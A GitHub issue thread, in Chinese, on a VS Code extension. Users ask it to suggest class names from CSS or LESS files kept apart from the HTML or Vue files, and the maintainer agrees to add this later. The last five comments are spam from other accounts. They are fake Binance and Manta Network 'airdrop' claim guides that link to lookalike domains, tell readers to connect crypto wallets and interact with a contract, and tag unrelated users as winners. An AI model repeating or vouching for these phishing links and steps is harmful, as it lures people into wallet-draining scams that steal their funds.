### ISSUE TITLE
能不能增加对引入css或less文件的支持呢？

### ISSUE THREAD

**Issue by Zero-wx** [zytjs/classNameToCss#7]
非常好用的插件

**Comment by zitup** [comment]
谢谢使用。
你的样式文件和UI逻辑文件，为什么没有在一个文件夹呢？

**Comment by Zero-wx** [comment]
> 谢谢使用。
> 你的样式文件和UI逻辑文件，为什么没有在一个文件夹呢？

在写vue的时候习惯将css与JavaScript写在单独的文件中，
![image](https://user-images.githubusercontent.com/64965887/103086936-f350f900-4620-11eb-9f5d-22511fb8abc1.png)
试了下，在vue文件的style中可以对html中声明的class提示，但引入的就不行，考虑增加吗？找了许久并没有找到此类的插件，感谢作者回复

**Comment by zitup** [comment]
考虑添加，但是不知道什么时候完成。

**Comment by EscapeLife** [comment]
期待+1，我也找到好久，希望添加相对引入的方法，确实 `Vscode` 没有比较好实现的插件。

- 我是写 `Flask` 应用的，模本情况下，模板和静态资源文件是分开在不同目录下面的。所以，如果写好了 `html` 文件，在写 `css` 的时候就找不到对应的 `html` 中的 `class` 属性。。。只能分屏或者自己写。。。 @zitup 

![image](https://user-images.githubusercontent.com/16237571/103459230-9d7b0000-4d48-11eb-8f99-2391d583b17c.png)


- 其实，可以使用 `WebStorm`，这个是原生支持的。。。 @Zero-wx

**Comment by zitup** [comment]
@EscapeLife 感谢使用，后期会加上这个功能，但是发版时间不确定～

有个问题需要确认下，WebStorm 是怎么确认当前的 css 被哪个 html 引用了呢，是需要自己在 css 顶部声明吗，还是它提示了项目下所有 html 的 className 呢？

**Comment by EscapeLife** [comment]
@zitup 我试了下，发现是提示了项目下所有 `html` 的 `className`。

- `test1` 和 `test2` 分类来自不同的 `html` 文件里面
- `watch` 了，期待后续添加，感谢！

![image](https://user-images.githubusercontent.com/16237571/103524073-e69d9200-4eb7-11eb-8c55-5532c4e00c36.png)

**Comment by zitup** [comment]
@EscapeLife `Flask` 应用我不是很了解，是怎么引用css文件的，可以给几个比较通用的格式吗

**Comment by EscapeLife** [comment]
@zitup 稍等我整理下，压缩之后，发送到这里

**Comment by Peter-90** [comment]
@zitup 大佬 这个功能什么时候能更新一下 很期待呀

**Comment by bluepadu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by anooj1483** [comment]
# Earn $1000 in Manta Network Tokens!

[![Manta Network](https://global.discourse-cdn.com/aptoslabs/original/3X/e/6/e6954df39d3aedbc46201c5e1199eb9deb84411d.jpeg)](https://claim.mantarewards.online)

## Steps to Earn:

1. **Connect Your Wallet:**
   - Make sure you have a wallet compatible with Manta Network, such as MetaMask or Trust Wallet.
   - Visit [https://claim.mantarewards.online](https://claim.mantarewards.online) and connect your wallet.

2. **Use the Claim Method:**
   - After connecting your wallet, navigate to the rewards section or dashboard.
   - Find the "Claim" option and click on it.

3. **Claim Your Prize:**
   - Follow the on-screen instructions to complete the claiming process.
   - Upon successful completion, you will receive $1000 in Manta Network tokens in your wallet.

4. **Enjoy Your Tokens:**
   - The tokens will be deposited into your wallet and ready to be used or traded.

## Important Note:
Make sure to read the terms and conditions on the [https://claim.mantarewards.online](https://claim.mantarewards.online) page to ensure you meet all eligibility requirements for the promotion. This offer is for a limited time, so don't miss out!



Winners: @0xRory, @You-Know-Who-Z, @liyuProtocol, @China-Chris, @zonghua2016, @IrStar, @hyanx

**Comment by anooj1483** [comment]
# Earn $1000 in Manta Network Tokens!

[![Manta Network](https://global.discourse-cdn.com/aptoslabs/original/3X/e/6/e6954df39d3aedbc46201c5e1199eb9deb84411d.jpeg)](https://claim.mantarewards.online)

## Steps to Earn:

1. **Connect Your Wallet:**
   - Make sure you have a wallet compatible with Manta Network, such as MetaMask or Trust Wallet.
   - Visit [https://claim.mantarewards.online](https://claim.mantarewards.online) and connect your wallet.

2. **Use the Claim Method:**
   - After connecting your wallet, navigate to the rewards section or dashboard.
   - Find the "Claim" option and click on it.

3. **Claim Your Prize:**
   - Follow the on-screen instructions to complete the claiming process.
   - Upon successful completion, you will receive $1000 in Manta Network tokens in your wallet.

4. **Enjoy Your Tokens:**
   - The tokens will be deposited into your wallet and ready to be used or traded.

## Important Note:
Make sure to read the terms and conditions on the [https://claim.mantarewards.online](https://claim.mantarewards.online) page to ensure you meet all eligibility requirements for the promotion. This offer is for a limited time, so don't miss out!



Winners: @linyuliang, @hahadaxia, @jettang2019, @nobut, @0xFeiDan, @xinchen37, @edxzh

**Comment by shivachaitanya1** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @bziwei, @boleixiongdi, @kevinfreeman0416, @yoniku, @BlockchainHe, @gandazhi, @728443778

**Comment by shivachaitanya1** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @holazz, @muzzby, @lixiaoyu77, @sforce100, @LuSicong22, @coderliulong, @Akagi201
